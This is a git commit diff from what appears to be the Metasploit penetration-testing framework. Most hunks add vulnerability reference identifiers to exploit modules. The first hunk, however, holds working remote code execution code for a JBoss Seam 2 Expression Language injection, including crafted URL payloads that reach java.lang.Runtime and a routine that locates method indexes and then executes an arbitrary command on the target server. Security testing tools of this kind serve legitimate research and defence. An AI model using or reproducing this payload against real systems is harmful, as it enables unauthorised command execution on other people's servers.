bug/bundler_fix
jvazquez-r7 2013-06-25 17:34:29 -05:00
commit 7ab4d4dcc4
14 changed files with 39 additions and 21 deletions

View File

@ -18,12 +18,17 @@ class Metasploit3 < Msf::Auxiliary
JBoss Seam 2 (jboss-seam2), as used in JBoss Enterprise Application Platform
4.3.0 for Red Hat Linux, does not properly sanitize inputs for JBoss Expression
Language (EL) expressions, which allows remote attackers to execute arbitrary code
via a crafted URL.
via a crafted URL. This modules also has been tested successfully against IBM
WebSphere 6.1 running on iSeries.
NOTE: this is only a vulnerability when the Java Security Manager is not properly
configured.
},
'Author' => [ 'guerrino di massa' ],
'Author' =>
[
'guerrino di massa', # Metasploit module
'Cristiano Maruti <cmaruti[at]gmail.com>' # Support for IBM Websphere 6.1
],
'License' => MSF_LICENSE,
'References' =>
[
@ -36,27 +41,25 @@ class Metasploit3 < Msf::Auxiliary
register_options(
[
Opt::RPORT(8080),
OptString.new('JBOSS_ROOT',[ true, 'JBoss root directory', '/']),
OptString.new('TARGETURI', [ true, 'Target URI', '/seam-booking/home.seam']),
OptString.new('CMD', [ true, "The command to execute."])
], self.class)
end
def run
jbr = normalize_uri(datastore['JBOSS_ROOT'])
uri = normalize_uri(target_uri.to_s)
cmd_enc = ""
cmd_enc << Rex::Text.uri_encode(datastore["CMD"])
flag_found_one = 0
flag_found_two = 0
flag_found_one = 255
flag_found_two = 255
uri_part_1 = "seam-booking/home.seam?actionOutcome=/pwn.xhtml?pwned%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()["
uri_part_1 = "?actionOutcome=/pwn.xhtml?pwned%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()["
uri_part_2 = "].invoke(expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()["
uri_part_3 = "].invoke(null),'"
print_status("Finding getDeclaredMethods() indexes... (0 to 24)")
25.times do |index|
req = jbr + uri_part_1 + index.to_s + "]}"
req = uri + uri_part_1 + index.to_s + "]}"
res = send_request_cgi(
{
@ -66,20 +69,20 @@ class Metasploit3 < Msf::Auxiliary
if (res.headers['Location'] =~ %r(java.lang.Runtime.exec\%28java.lang.String\%29))
flag_found_one = index
print_status("Found right index at [" + index.to_s + "]")
print_status("Found right index at [" + index.to_s + "] - exec")
elsif (res.headers['Location'] =~ %r(java.lang.Runtime\+java.lang.Runtime.getRuntime))
print_status("Found right index at [" + index.to_s + "]")
print_status("Found right index at [" + index.to_s + "] - getRuntime")
flag_found_two = index
else
print_status("Index [" + index.to_s + "]")
end
end
if (flag_found_one > 0 && flag_found_two > 0 )
if (flag_found_one != 255 && flag_found_two != 255 )
print_status("Target appears VULNERABLE!")
print_status("Sending remote command:" + datastore["CMD"])
req = jbr + uri_part_1 + flag_found_one.to_s + uri_part_2 + flag_found_two.to_s + uri_part_3 + cmd_enc + "')}"
req = uri + uri_part_1 + flag_found_one.to_s + uri_part_2 + flag_found_two.to_s + uri_part_3 + cmd_enc + "')}"
res = send_request_cgi(
{

View File

@ -36,8 +36,9 @@ class Metasploit3 < Msf::Exploit::Remote
],
'References' =>
[
[ 'CVE', '2011-4786'],
[ 'BID', '51396'],
[ 'CVE', '2011-4786' ],
[ 'OSVDB', '78306' ],
[ 'BID', '51396' ],
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-013/' ],
],
'DefaultOptions' =>

View File

@ -34,6 +34,7 @@ class Metasploit3 < Msf::Exploit::Remote
],
'References' =>
[
[ 'OSVDB', '78102' ],
[ 'EDB', '15668' ],
[ 'URL', 'http://secunia.com/advisories/42445/' ],
[ 'URL', 'http://xforce.iss.net/xforce/xfdb/63666' ]

View File

@ -34,6 +34,8 @@ class Metasploit3 < Msf::Exploit::Remote
],
'References' =>
[
['OSVDB', '88191'],
['EDB', '23225'],
['URL', 'http://blog.malerisch.net/2012/12/maxthon-cross-context-scripting-xcs-about-history-rce.html']
],
'Payload' =>

View File

@ -36,6 +36,7 @@ class Metasploit3 < Msf::Exploit::Remote
'References' =>
[
['CVE', '2011-2371'],
['OSVDB', '73184'],
['EDB', '17974'],
['URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=664009']
],

View File

@ -33,6 +33,7 @@ class Metasploit3 < Msf::Exploit::Remote
'References' =>
[
[ 'CVE', '2011-1996' ],
[ 'OSVDB', '76208' ],
[ 'MSB', 'MS11-081' ],
[ 'URL', 'http://ifsec.blogspot.com/2011/10/internet-explorer-option-element-remote.html' ],
[ 'URL', 'http://pastebin.com/YLH725Aj' ]

View File

@ -29,6 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote
'References' =>
[
[ 'CVE', '2013-0025' ],
[ 'OSVDB', '90122' ],
[ 'MSB', 'MS13-009' ],
[ 'URL', 'http://security-assessment.com/files/documents/advisory/ie_slayoutrun_uaf.pdf' ]
],

View File

@ -29,9 +29,10 @@ class Metasploit3 < Msf::Exploit::Remote
],
'References' =>
[
[ 'CVE', '2008-4915'],
[ 'BID', '49795'],
[ 'URL', 'http://aluigi.altervista.org/adv/pcvue_1-adv.txt'],
[ 'CVE', '2011-4044' ],
[ 'OSVDB', '77561' ],
[ 'BID', '49795' ],
[ 'URL', 'http://aluigi.altervista.org/adv/pcvue_1-adv.txt' ]
],
'DefaultOptions' =>
{

View File

@ -25,7 +25,9 @@ class Metasploit3 < Msf::Exploit::Remote
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/' ],
[ 'OSVDB', '68701' ],
[ 'EDB', '16738' ],
[ 'URL', 'http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/' ]
],
'DefaultOptions' =>
{

View File

@ -33,6 +33,7 @@ class Metasploit3 < Msf::Exploit::Remote
'References' =>
[
[ 'CVE', '2012-5357'],
[ 'OSVDB', '88107' ],
[ 'URL', 'http://webstersprodigy.net/2012/10/25/cve-2012-5357cve-1012-5358-cool-ektron-xslt-rce-bugs/' ],
[ 'URL', 'http://technet.microsoft.com/en-us/security/msvr/msvr12-016' ]
],

View File

@ -31,6 +31,7 @@ class Metasploit3 < Msf::Exploit::Remote
'References' =>
[
['CVE', '2011-0266'],
['OSVDB', '70473'],
['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-008/']
],
'Payload' =>

View File

@ -27,8 +27,9 @@ class Metasploit3 < Msf::Exploit::Remote
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-10-118' ],
[ 'CVE', '2010-0904' ],
[ 'OSVDB', '66338' ],
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-10-118' ]
# the jlist vector has not been disclosed or has it?
],
'Targets' =>

View File

@ -34,6 +34,7 @@ class Metasploit3 < Msf::Exploit::Remote
],
'References' =>
[
[ 'OSVDB', '83889' ],
[ 'EDB', '19625' ]
],
'DefaultOptions' =>

View File

@ -31,6 +31,7 @@ class Metasploit3 < Msf::Exploit::Remote
'References' =>
[
[ 'CVE', '2012-4959'],
[ 'OSVDB', '87573' ],
[ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2012/11/16/nfr-agent-buffer-vulnerabilites-cve-2012-4959' ]
],
'Payload' =>